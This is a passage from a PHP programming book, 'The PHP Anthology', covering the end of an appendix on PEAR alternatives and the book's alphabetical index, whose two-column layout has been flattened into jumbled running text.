  • 528. 504 The PHP Anthology baseinstalldir (or just the root PEAR class directory if there’s no baseinstalldir attribute), where each file should be placed. Alternatives to PEAR Many repositories of reusable PHP classes are available. Some web sites, such as PHP Classes,10 offer user-contributed work for download, while others, such as eZ Components,11 manage their own code base of reusable classes that can be down­ loaded as a package. For more tightly integrated repositories of code, you might like to investigate the numerous rapid application development frameworks available, such as the Zend Framework12 and CakePHP.13 It’s not within the scope of this book to cover any of these frameworks in depth, or comment on which will best suit your needs, but on the whole, reusing code from any of these sources, including PEAR, can save you development time and allow you to concentrate on writing software that solves your needs, rather than rewriting basic components for every project. Note, however, that some overhead is involved when you’re starting out with code from repositories and frameworks. Writing all your code from scratch might be the fastest solution in the short term, but selecting and becoming fluent with one repos­ itory or framework will help decrease your development time in the medium term, and will benefit anyone that writes more than one web site. You’ll also find that selecting the right framework will make it easier for other developers to come up to speed when they’re working on the sites you create. Also, avoid switching devel­ opment environments frequently, as this will reset your learning curve and might adversely affect your productivity. Finally, remember that when you use code from any repository that accepts public contributions with little or no requirement for quality control, you might be opening yourself up to all sorts of problems, from security vulnerabilities to reliance on stale and unmaintained components. 10 http://www.phpclasses.org/ 11 http://ez.no/ezcomponents/ 12 http://framework.zend.com/ 13 http://www.cakephp.org/
  • 529. Index aggregation Symbols about, 23 $_SESSION, 278, 281 agile documentation $this variable, 15, 32 about, 459 .forward file, 191 allow_url_fopen, 477 .htaccess file, 473 anti-spam (see spam legislation) .ini files Apache web server storing configuration information, 164 caching, 367 hosting support, 483 A HTTP authentication, 271 abstract classes PHP installation, 485 about, 27 APIs abstract methods about, 13 about, 28 callback arguments, 353 AcceptPathInfo documenting, 448 "pretty" URLs, 140 REST web services, 429 access arguments to cron utility, 485 overriding properties, 21 files on remote servers, 166–167 arrays to SSH, 484 of lines, 86–88 URLs, 495 reading files as, 149 access control, 269–362 strings, 78 changing passwords, 330–338 asp_tags, 477 forgotten passwords, 318–330 assertions HTTP authentication, 271–277 testing framework, 461 permission systems, 339–353 attachments private sections of web sites, 283–297 adding to email messages, 184–186 registration systems, 297–318 Auth class, 283 session classes, 281–282 authentication storing sessions in databases, 353–362 (see also HTTP authentication) using sessions, 277–281 defined, 295 AccountMaintenance class, 319, 331 security, 494 adding authentication headers, 275 data in databases, 53–55 authorization defined, 296
  • 530. 506 authorization header, 276 Cache_Lite_Function class, 391 auto_append_file, 478 caching, 363–393 auto_prepend_file, 478 client-side, 367–371 auto-commit mode examining HTTP headers in web default mode, 66 browsers, 371–372 autoincrementing field file downloads with Internet Explorer, determining INSERT's row number, 372–373 62–63 function calls, 390–392 output buffering for server-side cach­ B ing, 373–377 back-ups parts of pages, 377–381 database, 69–75 PEAR::Cache_Lite configuration op­ bandwidth tions, 385–389 reading files, 152 purging Cache_Lite cache, 389–390 bar graph using PEAR::Cache_Lite for server- creating, 224 side caching, 382–385 batch jobs calendars scheduling, 485 creating, 102–107 behavioral testing call_time_pass_reference, 476 about, 459 callbacks branches arguments, 353 revision control software, 438 error handler prototype, 242 bridge tables CAPTCHA (Completely Public Turing about, 340 Test to Tell Computers and Hu­ browsers (see Internet Explorer; web mans) browsers) image verification, 234 buffering (see output buffering) CGI mode, 485 build systems change password form developing code, 470 example of, 333 changesets C revision control software, 437 cache files characters (see escape characters; wild­ protecting, 385 card characters) Cache_Lite (see PEAR::Cache_Lite) charts Cache_Lite cache displaying, 223–230 purging, 389–390
  • 531. 507 classes configuration, 473–481 (see also abstract classes; PEAR; spe­ documentation about, 3 cific classes) PEAR::Cache_Lite, 385–389 about, 10 for portable code, 33 access control for sections of web settings, 286 sites, 283–297 storing configuration information in repositories of reusable PHP classes, files, 163–165 504 configuration files client-side caching used in access control examples, 270 controlling, 367–371 constructors code Auth class, 284 (see also source code) defined, 14 coding standards, 446 overriding, 22 deploying, 468–471 content documenting, 448–453 searching for in XML, 409–412 maintaining multiple versions, 438– content-disposition header, 170 441 content-length header, 171 reuse, 9 Content-Type header, 170, 198 revising old code, 467–468 control (see access control; error hand­ testing framework, 454–462 ling) tracking revisions, 436–438 COUNT function writing distributable code, 441–448 rows returned from a SELECT call, 60 writing portable code, 33–38 credentials code coverage reports, 463 passing in DSN, 44 command line cron utility use of, 485, 486 access to, 485 communications cross-site request forgery (CSRF) security, 495 about, 493 composition cross-site scripting (XSS), 83 about, 25 about, 489–491 compressing session security, 281 database data, 174 cryptographic storage files, 172–174 security, 495 concatenation CURRENT_TIMESTAMP function, 108 strings, 78 Concurrent Versioning System (CVS), 437
  • 532. 508 D DATE_FORMAT function, 109 DATE_SUB function, 111 data dates and times, 95–113 compressing in databases, 174 (see also HTTP dates) outputting in table, 127–129, 130–133 calendars, 102–107 data grids current, 98–99 customized, 134–139 date calculations using MySQL, 111– data types 112 strings, 77 days of the week, 101 database connections formatting MySQL timestamps, 109– setting up, 311 110 database servers number of days in month, 101–102 port numbers, 44 storing dates in MySQL, 107–109 database transactions Unix timestamps, 96–98 defined, 66 days databases, 39–75 in a month, 101–102 accessing, 41–44 of week, 101 adding or modifying data, 53–55 defaults backing-up, 69–75 error mode, 50 compressing data, 174 mode in PDO, 66 errors in SQL queries, 49–52 deploying escape characters, 80 code, 468–471 fetching data from tables, 44–49 destructors flexible SQL statements, 57–59 defined, 14 INSERT's row number using autoincre­ dir pseudo-class, 161 menting field, 62–63 direct object references PDO, 40–41 security, 491 permission systems, 339 directories rows affected by SQL queries, 59–61 examining, 160–161 searching tables, 63–64 DirectoryIterator class, 174 SQL injection attacks, 55–57 display_errors directive, 240, 261, 477 storing sessions, 353–362 displaying (see outputting) transactions, 65–67 distributed systems DatabaseSession class, 354, 361 revision control software, 437 date function, 99, 101, 371 docblocks DATE_ADD function, 111 about, 449 date_default_timezone_set function, 99
  • 533. 509 documentation email injection attacks, 193–195 (see also agile documentation) encapsulation code, 448–453 about, 13 for PHP, 2–9 environmental errors test suites as, 453 defined, 237 DOM environmental PHP errors generating XML, 407 handling as exceptions, 260 DOM functions ERRMODE_EXCEPTION, 51 navigating XML, 405 ERRMODE_SILENT, 50 DOM XML extension, 397 ERRMODE_WARNING, 50 downloads error handling, 237–268 caching files with Internet Explorer, custom error handlers, 242–247 372–373 custom exception class, 252–257 DSN (Data Source Name) custom exception handler, 257–260 about, 43 displaying errors and exceptions, 261– dynamic SQL 265 sprintf function, 59 E_STRICT constant, 173 dynamic web pages error levels reported, 238–240 caching, 363 handling as if they were exceptions, 260–261 E logging and reporting, 247–248 E_ERROR error level, 240 redirecting to another page, 265–267 E_NOTICE error level, 240 security, 493 E_STRICT error level, 173, 181, 240, 293 settings, 239–241, 480 E_USER_ERROR error level, 240, 242 SQL queries, 49–52 E_USER_NOTICE error level, 240, 241 triggering errors, 241–242 E_USER_WARNING error level, 240, 242 using exceptions for, 248–252 E_WARNING error level, 240 error notices email, 179–196 JpGraph, 224 adding attachments, 184–186 error_log, 480 email injection attacks, 193–195 error_log directive, 241 generating complex emails, 182–184 error_log function, 263 groups, 188–191 error_reporting directive, 239, 477 incoming email, 191–193 escape characters sending files, 171 in databases, 80 sending HTML email, 186–188 exception class, 252–257 sending simple email, 179–182
  • 534. 510 exception classes fields (see auto-incrementing field; form defining, 300 fields) exception handlers file execution attacks, 491 implementing, 257–260 file handles exception mode using, 153–155 errors in SQL queries, 51 file pointers exceptions using, 153 displaying, 261–265 file_get_contents function, 150 handling errors as if they were excep­ file_put_contents function, 156 tions, 260–261 files, 147–177 using for error handling, 248–252 (see also specific files; ZIP utility) execution accessing information about local settings, 475–479 files, 157–159 EXIF information accessing on remote servers, 166–167 extracting, 217–220 caching downloads with Internet Ex­ exif_read_data function, 218 plorer, 372–373 Expires header, 371 creating compressed ZIP/TAR files, Expires meta tag, 366 172–174 explode function, 86 examining directories, 160–161 extension, 481 FTP, 167–169 extension_dir, 481 managing downloads, 170–172 extensions modifying local files, 155–156 available from hosting service, 486 outputting source code online, 161– documentation about, 5 163 XML, 396–398 reading local files, 148–152 extracting SPL, 174–177 files, 173 storing configuration information in, 163–165 F fonts (see TrueType fonts) fatal errors form fields handling as exceptions, 260 prepopulating, 80 features formatting documentation about, 4 dates, 96 fetchObject method MySQL timestamps, 109–110 prepare and execute, 49 output text, 88–90 strings, 81–82
  • 535. 511 forms (see HTML forms) hinting (see type hinting) FTP (File Transfer Protocol) hints using, 167–169 passwords, 319 function calls hosting caching, 390–392 checklist, 483–487 functions HTML (see also specific functions) meta tags, 365 file information, 157 HTML email fwrite function, 156 sending, 186–188 HTML forms G building, 116–127 galleries (see thumbnail galleries) HTML tags generating stripping from text, 82–83 (see also sending) HTML_QuickForm class, 117 complex emails, 182–184 HTML_Quickform package, 309, 325 GNU Make, 470 HTML_Table class, 127 graphical watermarks HTML_Table_Matrix class, 102 displaying, 221 htmlentities function, 80 graphs HTTP authentication displaying, 223–230 about, 271–277 grids (see data grids) HTTP Authentication package, 276 groups HTTP dates email, 188–191 calculation of, 371 HTTP headers H caching, 365 handles (see file handles; file pointers) examining in web browsers, 371–372 header lines file downloads, 170 email injection attacks, 193 output buffering, 377 headers (see authentication headers; au­ HTTP response headers, 278 thorization header; Expires header; http.conf file HTTP headers; request headers; hotlinking images, 231 page expiry headers) help (see documentation) I highlight_file function, 162 ignore_repeated_errors, 480 highlight_string function, 161 ignore_repeated_source, 480 imagecopyresampled function, 201 images, 197–236
  • 536. 512 charts and graphs, 223–230 interpolation EXIF information, 217–220 (see also variable interpolation) hotlinking, 230–234 strings, 77 human verification, 234–235 INTERVAL keyword, 111 MIME type, 198–199 resizing, 202–213 J thumbnail galleries, 214–217 jobs (see batch jobs) thumbnails, 199–202 JpGraph library, 223 watermarks, 220–223 implode function, 87 L include_path, 478 LAMP includes hosting support, 483 settings, 475–479 levels incoming email errors, 238–240 handling, 191–193 LIKE operator information leakage searching tables, 63 security, 493 lines inheritance arrays of, 86–88 about, 17 Linux ini_alter, 474 dates, 97 ini_set, 474 hosting support, 483 injection flaws, 491 session security, 280 INSERT function listInsertId method data into databases, 53 using, 62 determining row number with local files autoincrementing field, 62–63 accessing information about, 157–159 installation modifying, 155–156 documentation about, 3 reading, 148–152 PEAR, 498–504 localhost PHP on Apache web server, 485 connecting to MySQL databases, 41 Zend Framework, 395 log_errors, 241, 480 interfaces logging (see also object interfaces) errors, 247–248 defined, 27 logic errors Internet Explorer defined, 238 caching file downloads, 372–373
  • 537. 513 login multi-processing module (MPM) magic quotes, 288 hosting support, 484 MultiViews M "pretty" URLs, 140 magic methods MyISAM engine about, 14 performance, 361 magic quotes MySQL checking for, 37 calculating dates, 111–112 magic_quotes_gpc, 288, 476 MyISAM engine performance, 361 mail function, 180 stored procedure example, 68–69 Mail_mime package, 309, 325 storing dates, 107–109 max_execution_time, 478 MySQL databases MD5 algorithm connecting to on localhost, 41 passwords, 286 MySQL timestamps security, 495 formatting, 109–110 member variables (see properties) mysql_real_escape_string function, 80 memory_limit, 479 MySQLDump class meta tags operating system configuration, 70 caching, 365 using, 72 methods (see also abstract methods; magic N methods; static methods) namespaces about, 11 choosing, 445 overriding, 20 defined, 413 Microsoft Windows (see Windows) nodes MIME type searching for in XML, 409–412 specifying, 198–199 non-distributed systems mktime function, 97 revision control software, 437 mod_rewrite “notice” error messages, 186 "pretty" URLs, 141 NOW function, 108 hotlinking images, 231 modes (see exception mode; silent mode; O warning mode) object interfaces modifying about, 29 data in databases, 53–55 object oriented programming (OOP) local files, 155–156 about, 9–33
  • 538. 514 using, 442 preventing web browsers from cach­ object type hinting, 249 ing, 365–367 objects parsing creating, 14 RSS feeds, 398–405 treating as strings, 16 XML with XMLReader, 399 open source passing revision control software, 437 credentials in DSN, 44 Open Web Application Security Project passwords (OWASP), 489 changing, 330–338 open_basedir, 477 forgotten, 318–330 operating systems MD5 algorithm, 286 MySQLDump class, 70 security, 494 output buffering PDO (PHP Data Object) caching parts of pages, 378 about, 40–41 displaying errors and exceptions, 261 auto-commit mode, 66 server-side caching, 373–377 PEAR, 497–504 outputting alternatives to, 504 charts and graphs, 223–230 installing, 498–504 data in table, 127–129, 130–133 PEAR Coding Standards, 446 errors and exceptions, 261–265 PEAR package manager, 501–503 formatted text, 88–90 PEAR packages source code online, 161–163 PHP 5 E_STRICT compliance, 293 strings, 79–81 PEAR::Cache_Lite overloading configuration options, 385–389 servers, 484 server-side caching, 382–385 overriding PEAR::HTML_QuickForm package, 297 constructors, 22 PEAR::Mail class, 182 methods and properties, 20 PEAR::Mail package, 180 PEAR::Mail_Mime class, 182, 184, 186, P 188, 297 packet sniffers PEAR::Net_FTP class, 168 data security, 270 PEAR::Validate class, 90 page expiry headers performance setting, 367 MyISAM engine, 361 pages permissions caching parts of, 377–381 files on Unix-based Web servers, 156
  • 539. 515 permissions systems programming errors building, 339–353 defined, 237 Phing, 470 properties php.ini file (see also static properties) configuration, 473 about, 11 date.timezone setting, 99 overriding, 20 error handling settings, 242 protected visibility error logging settings, 247 defined, 13 safe_mode, 486 protecting phpDocumentor, 449 cache files, 385 phpinfo function, 485 prototypes phpt testing framework, 456, 460 error handlers, 242 PHPUnit, 456, 461 proxy servers pie charts caching, 366 creating, 227 public interfaces (see APIs) placeholders public visibility date function, 100 defined, 13 pointers (see file pointers) purging polymorphism Cache_Lite cache, 389–390 about, 27 port numbers Q database servers, 44 Query method portability PDO database access, 45 settings, 475–477 post_max_size, 479 R prepare and execute methods read function, 356 PDO database access, 46 readCache function, 378 SQL injection attack, 55 readdir function, 160 prepopulating readfile function, 152, 170 form fields, 80 reading preserve state, 277 local files, 148–152 "pretty" URLs, 139–145 realm printf function, 89 HTTP authentication, 276 printing (see outputing) redirecting private implementation to another page, 265–267 defined, 13
  • 540. 516 refactoring rules (see validation rules) about, 467 register_globals, 36, 476 S registration forms safe_mode, 486 example of, 317 SAX registration systems parsing RSS feeds, 404 building, 297–318 XML extension, 397 relational databases scalar PHP support for, 39 strings, 77 remote servers scheduling accessing files on, 166–167 batch jobs, 485 replace operations screening advanced, 84–86 web site visitors, 297 report_memleaks, 480 scripts (see stored procedures) reporting handling incoming email, 191 (see also error handling) hosting policy, 485 errors, 247–248 search operations repositories advanced, 84–86 layout, 438 searching reusable PHP classes, 504 for nodes or content in XML, 409–412 request headers, 368 tables, 63–64 resellers security, 489–496 hosting services, 484 data transmission, 269 reserved words, 341 documentation about, 4 resetting email injection attacks, 193–195 passwords, 325 files, 148, 156, 165 resizing hiding code, 163 images, 202–213 sessions, 280 REST web services settings, 475–477 consuming, 425–431 SELECT call serving, 431–433 number of rows returned, 60 revision control software (RCS) sending about, 436–438 (see also generating) RSS feeds email to groups, 188–191 generating, 405–409 HTML email, 186–188 parsing, 398–405 simple email, 179–182
  • 541. 517 servers SimpleXML (see also Apache web server; database parsing RSS feeds, 398 servers; proxy servers; remote REST web services, 426 servers; web servers) XML extension, 397 displaying errors, 261 SOAP web services overloading, 484 consuming, 420–422 session files, 280 serving, 423–425 swapping, 279 SOAP XML extension, 398 server-side caching SoapClient class, 421 output buffering, 373–377 source code using PEAR::Cache_Lite for, 382–385 outputting online, 161–163 services (see web services; XML) spam legislation session class, 281–282 about, 190 session management SPL (Standard PHP Library) security, 494 using, 174–177 session.save_path, 481 sprintf function, 89 session.use_cookies, 481 dynamic SQL, 59 session_regenerate_id function, 494 SQL, 44–61 sessions adding or modifying data in databases, storing, 279 53–55 using, 231, 277–281 errors, 49–52 set_error_handler function, 243, 257, 260 fetching data from tables, 44–49 set_exception_handler function, 257 flexible SQL statements, 57–59 settingAllowOverride, 486 rows affected by a query, 59–61 settings, 475–481 stored procedures, 67–69 configuration, 286 SQL injection attacks error handling, 239–241, 242, 480 about, 491 includes and execution, 475–479 prepare and execute methods, 55 miscellaneous, 481 protecting from, 55–57 security and portability, 475–477 SSH short_open_tag, 476 access to, 484 SignUp class, 299 SSL signup page security, 495 creating, 308 standards silent mode coding, 446 errors in SQL queries, 50 static methods SimpleTest, 456, 461 about, 31
  • 542. 518 validating strings, 90 Structures_DataGrid class, 134 static properties Subversion (SVN), 436, 437 about, 31 swapping stored procedures servers, 279 cross-site scripting security exploit, symlinks 83 deploying code, 468 using with PDO, 67–69 syntax errors storing defined, 237 configuration information in files, 163–165 T cryptographic data, 495 tables dates in MySQL, 107–109 fetching data, 44–49 sessions elsewhere from server, 279 outputting data, 127–129, 130–133 sessions in databases, 353–362 searching, 63–64 str_replace function, 85 tags streams deploying code, 468 accessing files, 166 revision control software, 438 string functions TAR files using XML extension instead of, 396– creating, 172–174 398 template caching strings, 77–94 about, 376 breaking up text into arrays of lines, ternary operators 86–88 reading files as arrays, 149 formatting, 81–82 Test Driven Development (TDD) outputting formatted text, 88–90 defined, 462 outputting safely, 79–81 test environments, 461 reading files as, 150 test pages search and replace, 84–86 permission systems, 349 stripping HTML tags from text, 82–83 test suites treating objects as, 16 as documentation, 453 trimming white space, 88 testing validating submitted data, 90–94 code coverage, 463–467 wrapping text, 84 text strip_quotes.php file, 91 arrays of lines, 86–88 stripping outputting, 88–90 HTML tags from text, 82–83 trimming white space, 88 strtotime function, 101, 102 wrapping, 84
  • 543. 519 text watermarks uptime command, 484 displaying, 220 URLs threaded multi-processing module "pretty", 139–145 (MPM) access, 495 hosting support, 484 direct object reference attacks, 491 thumbnail galleries User class, 343 creating, 214–217 utilities (see cron utility; ZIP utility) thumbnail images creating, 199–202 V times (see dates and times) validation rules timestamps (see MySQL timestamps; forms, 120 Unix timestamps) variable interpolation tracking strings, 77 code revisions, 436–438 variables transactions constructing SQL statements, 57 databases, 65–67 verification trigger_error function, 241 of images by humans, 234 triggering versions errors, 241–242 multiple code, 438–441 trimming visibility white space from text, 88 defined, 13 TrueType fonts JpGraph, 225 W type hinting warning mode about, 25 errors in SQL queries, 50 types watermarks data, 77 adding to images, 220–223 web browsers U (see also Internet Explorer) Unix examining HTTP headers, 371–372 session security, 280 preventing from caching pages, 365– Unix timestamps 367 using, 96–98 web hosting (see hosting) UPDATE function web pages (see pages) data into databases, 54 web servers upgrades (see also Apache web server) hosting service policy, 486
  • 544. 520 caching, 364 generating RSS feeds, 405–409 preventing web browsers from caching parsing RSS feeds, 398–405 pages, 365–367 REST web services, 426 web services, 412–434 searching for nodes or content, 409– (see also XML) 412 consuming REST, 425–431 XMLReader consuming SOAP, 420–422 parsing XML, 399 consuming XML-RPC services, 412– XMLReader class, 397 416 XML-RPC web services serving REST, 431–433 consuming, 412–416 serving SOAP, 423–425 serving, 416–420 serving XML-RPC, 416–420 XML-RPC XML extension, 398 week xmlrpc_encode_request function, 414 day of, 101 XMLWriter class, 397 WHERE clause generating XML, 408 UPDATE and DELETE SQL com­ XPath mands, 61 searching XML, 410 whitespace XPath XML extension, 397 trimming, 88 XSL XML extension, 397 wildcard characters XXS (see cross-site scripting) about, 64 Windows Z dates, 97 Zend Framework MySQLDump class, 72 coding standards, 447 wordwrap function, 84 installing, 395 wrapper class, 281 REST web service, 430 wrapping XML-RPC, 413 text, 84 Zend_Feed class write function, 357 SimpleXML, 403 writeCache function, 378 Zend_XmlRpc_Server class, 416, 419 WSDL ZIP utility SOAP web services, 421, 424 backing up databases, 71 creating files, 172–174 X XDebug, 463 XML, 395–412 extensions, 396–398